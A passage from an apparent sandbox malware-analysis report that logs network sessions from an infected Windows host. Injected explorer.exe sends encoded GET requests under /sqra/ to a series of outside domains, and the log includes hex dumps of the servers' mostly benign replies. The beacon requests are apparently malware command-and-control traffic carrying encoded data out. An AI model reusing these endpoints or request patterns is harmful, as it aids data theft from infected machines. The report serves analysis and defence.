                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                        Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
                                                                        Apr 8, 2021 13:01:15.762228012 CEST1261INData Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20
                                                                        Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
                                                                        Apr 8, 2021 13:01:15.762248039 CEST1262INData Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34
                                                                        Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
                                                                        Apr 8, 2021 13:01:15.762270927 CEST1262INData Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75
                                                                        Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
                                                                        Apr 8, 2021 13:01:15.762526035 CEST1264INData Raw: 64 57 72 56 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a
                                                                        Data Ascii: dWrV84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS
                                                                        Apr 8, 2021 13:01:15.762551069 CEST1265INData Raw: 73 55 74 73 78 4c 45 35 68 38 53 70 70 4e 4d 66 78 35 69 6a 57 48 70 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a
                                                                        Data Ascii: sUtsxLE5h8SppNMfx5ijWHpb3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFI
                                                                        Apr 8, 2021 13:01:15.762573004 CEST1266INData Raw: 6a 66 69 63 35 33 53 6e 75 34 72 53 74 2b 48 74 59 6a 2b 4a 76 41 47 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77
                                                                        Data Ascii: jfic53Snu4rSt+HtYj+JvAGJIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2u
                                                                        Apr 8, 2021 13:01:15.762597084 CEST1268INData Raw: 62 61 4b 64 68 59 6b 30 71 76 4f 51 56 49 71 79 6b 70 38 72 73 6c 57 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53
                                                                        Data Ascii: baKdhYk0qvOQVIqykp8rslWKKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOY
                                                                        Apr 8, 2021 13:01:15.762617111 CEST1269INData Raw: 50 33 55 43 44 61 59 67 2f 34 41 2f 4a 38 2b 65 6d 71 41 74 30 47 53 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73
                                                                        Data Ascii: P3UCDaYg/4A/J8+emqAt0GSW9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBW
                                                                        Apr 8, 2021 13:01:15.904820919 CEST1271INData Raw: 39 79 46 49 39 70 49 64 59 71 59 66 31 4d 41 4e 36 52 49 2b 77 53 49 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37
                                                                        Data Ascii: 9yFI9pIdYqYf1MAN6RI+wSI/qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMf
                                                                        Apr 8, 2021 13:01:15.904866934 CEST1272INData Raw: 7a 78 79 74 44 78 7a 39 59 57 58 72 49 30 52 76 65 72 78 69 76 54 6f 6a 4f 68 34 6a 75 78 2f 2b 31 56 58 54 78 62 31 79 78 6b 32 74 38 78 33 39 34 4e 59 4b 5a 7a 47 4a 67 54 4a 76 5a 45 4b 6d 48 47 6e 58 2b 66 57 73 64 38 2f 6a 33 72 63 6f 34 68
                                                                        Data Ascii: zxytDxz9YWXrI0RverxivTojOh4jux/+1VXTxb1yxk2t8x394NYKZzGJgTJvZEKmHGnX+fWsd8/j3rco4hEv/NWsRbRSABTC+WmhjGq38Y6vNtNBK37+gl4Q/YKMRm0zCZpNii0mz1TSxzWQ5weTjl4ECO02RXaYUvxHk2Wsq7DNiv6lywNR4nmnh+abOC0yVF5pWXmQavNi08RLTzkvNJF5ncrzVpHmbSXg77yLNu3kfBd5vMn


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        4192.168.2.349727184.168.131.24180C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:01:26.191338062 CEST1314OUTGET /sqra/?NBZl=A685XXlO5s8wdT2GSl4VwObxhyaN1usH/ZDf3g436hkZTbYdTSv6UxS6ZdhF3LcC3Fcd&lzul=wRDL7BohbLBLJV HTTP/1.1
                                                                        Host: www.ecomcourse.online
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:01:26.698020935 CEST1314INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx/1.16.1
                                                                        Date: Thu, 08 Apr 2021 11:01:26 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Location: http://www.udemy.com/course/ecom-dropshipping/?referralCode=A72F9D646A0B66840647
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        5192.168.2.349731108.186.210.14280C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:01:32.580770969 CEST1371OUTGET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=94GGx2Cs8EYqYWyk7qEtIIzRN3fkRhfUxg2Vtzz5w0QY/7xu41tS8mQoIQP3aceFOvfi HTTP/1.1
                                                                        Host: www.huongdandidong.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:01:32.746746063 CEST1371INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Thu, 08 Apr 2021 10:59:41 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Data Raw: 36 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 2f 6a 73 2f 77 77 64 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 69<html><head><script type='text/javascript' src='/js/wwd.js'></script></head><body></script></body></html>0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        6192.168.2.349737144.76.207.7680C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:01:37.939346075 CEST5389OUTGET /sqra/?NBZl=XY+ZErIRkQWtvrbZzW/Q2VqSgxI2oDXvZ0FX1dCtO5jFwgiNlKUf7p0wm51D3p8eN5aQ&lzul=wRDL7BohbLBLJV HTTP/1.1
                                                                        Host: www.muzhskoy-eskort.site
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        7192.168.2.349738199.59.242.15380C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:01:43.214939117 CEST5390OUTGET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK HTTP/1.1
                                                                        Host: www.simplyhealrhcareplans.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:01:43.326561928 CEST5391INHTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Thu, 08 Apr 2021 11:01:43 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_b89+lPyWjYN9+1Zxni+v+D9UpCJXk1dtxqTBtQwgoRWYYdonh2ztCrm4uICYDrm/6PgZmwfEMYmMBlTR9b4jKA==
                                                                        Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 38 39 2b 6c 50 79 57 6a 59 4e 39 2b 31 5a 78 6e 69 2b 76 2b 44 39 55 70 43 4a 58 6b 31 64 74 78 71 54 42 74 51 77 67 6f 52 57 59 59 64 6f 6e 68 32 7a 74 43 72 6d 34 75 49 43 59 44 72 6d 2f 36 50 67 5a 6d 77 66 45 4d 59 6d 4d 42 6c 54 52 39 62 34 6a 4b 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                        Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_b89+lPyWjYN9+1Zxni+v+D9UpCJXk1dtxqTBtQwgoRWYYdonh2ztCrm4uICYDrm/6PgZmwfEMYmMBlTR9b4jKA=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one
                                                                        Apr 8, 2021 13:01:43.326596022 CEST5392INData Raw: 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 61 7a 78 2e 73 65 61 72 63 68 21 3d 3d 27 3f 7a 27 29 7b 61 7a 78 2e 68 72 65 66 3d 27 2f 3f 7a 27 3b 7d 7d 3b 44 44 2e 6f 6e 6c 6f 61 64 3d 44 44 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63
                                                                        Data Ascii: rror=function(){if(azx.search!=='?z'){azx.href='/?z';}};DD.onload=DD.onreadystatechange=function(){if(!aAC&&LU){if(!window['googleNDT_']){}LU(google.ads.domains.Caf);}aAC=true;};DT.body.appendChild(DD);return{azm:function(n$){if(aAC)n$(goog
                                                                        Apr 8, 2021 13:01:43.326626062 CEST5394INData Raw: 2c 52 72 3d 77 69 6e 64 6f 77 2c 61 7a 78 3d 52 72 2e 6c 6f 63 61 74 69 6f 6e 2c 61 41 42 3d 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2c 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 53 66 3d 44 54 2e 62 6f 64 79 7c 7c 44 54 2e 67 65 74 45 6c 65 6d 65 6e 74 73
                                                                        Data Ascii: ,Rr=window,azx=Rr.location,aAB=top.location,DT=document,Sf=DT.body||DT.getElementsByTagName('body')[0],aAy=0,aAx=0,aAz=0,$IE=null;if(Sf.className==='ie6')$IE=6;else if(Sf.className==='ie7')$IE=7;else if(Sf.className==='ie8')$IE=8;else if(Sf
                                                                        Apr 8, 2021 13:01:43.326647043 CEST5394INData Raw: 67 5f 70 64 2e 72 5f 77 68 3a 27 26 77 68 3d 27 2b 61 41 78 29 2b 0a 28 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72 64 21 3d 3d 65 66 3f 27 26 72 65 66 5f 6b 65 79 77 6f 72 64 3d 27 2b 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72 64 3a 27 27 29
                                                                        Data Ascii: g_pd.r_wh:'&wh='+aAx)+(g_pd.ref_keyword!==ef?'&ref_keyword='+g_pd.ref_keyword:'')+(g_pc.$isWhitelisted()?'&abp=1':'')+($IE!==null?'&ie='+$IE:'')+(g_pd.partner!==ef?'&partner='+g_pd.partner:'')+(
                                                                        Apr 8, 2021 13:01:43.327739000 CEST5395INData Raw: 31 31 35 0d 0a 67 5f 70 64 2e 73 75 62 69 64 31 21 3d 3d 65 66 3f 27 26 73 75 62 69 64 31 3d 27 2b 67 5f 70 64 2e 73 75 62 69 64 31 3a 27 27 29 2b 0a 28 67 5f 70 64 2e 73 75 62 69 64 32 21 3d 3d 65 66 3f 27 26 73 75 62 69 64 32 3d 27 2b 67 5f 70
                                                                        Data Ascii: 115g_pd.subid1!==ef?'&subid1='+g_pd.subid1:'')+(g_pd.subid2!==ef?'&subid2='+g_pd.subid2:'')+(g_pd.subid3!==ef?'&subid3='+g_pd.subid3:'')+(g_pd.subid4!==ef?'&subid4='+g_pd.subid4:'')+(g_pd.subid5!==ef?'&subid5='+g_pd.subid5:'');Sf.appendC


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        8192.168.2.3497393.223.115.18580C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:01:53.613534927 CEST5397OUTGET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=nD+8EQ/dkrvxrfeXfZTM4uqVidyysXGGAQQPcyuh+D+qYnXcwF5fcGHppY2Ae0Rizhob HTTP/1.1
                                                                        Host: www.socialunified.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:01:53.714488029 CEST5397INHTTP/1.1 302 Found
                                                                        Cache-Control: private
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Location: https://www.hugedomains.com/domain_profile.cfm?d=socialunified&e=com
                                                                        Server: Microsoft-IIS/8.5
                                                                        X-Powered-By: ASP.NET
                                                                        Date: Thu, 08 Apr 2021 11:01:47 GMT
                                                                        Connection: close
                                                                        Content-Length: 189
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 67 65 64 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 70 72 6f 66 69 6c 65 2e 63 66 6d 3f 64 3d 73 6f 63 69 61 6c 75 6e 69 66 69 65 64 26 61 6d 70 3b 65 3d 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=socialunified&amp;e=com">here</a>.</h2></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        9192.168.2.34974134.102.136.18080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
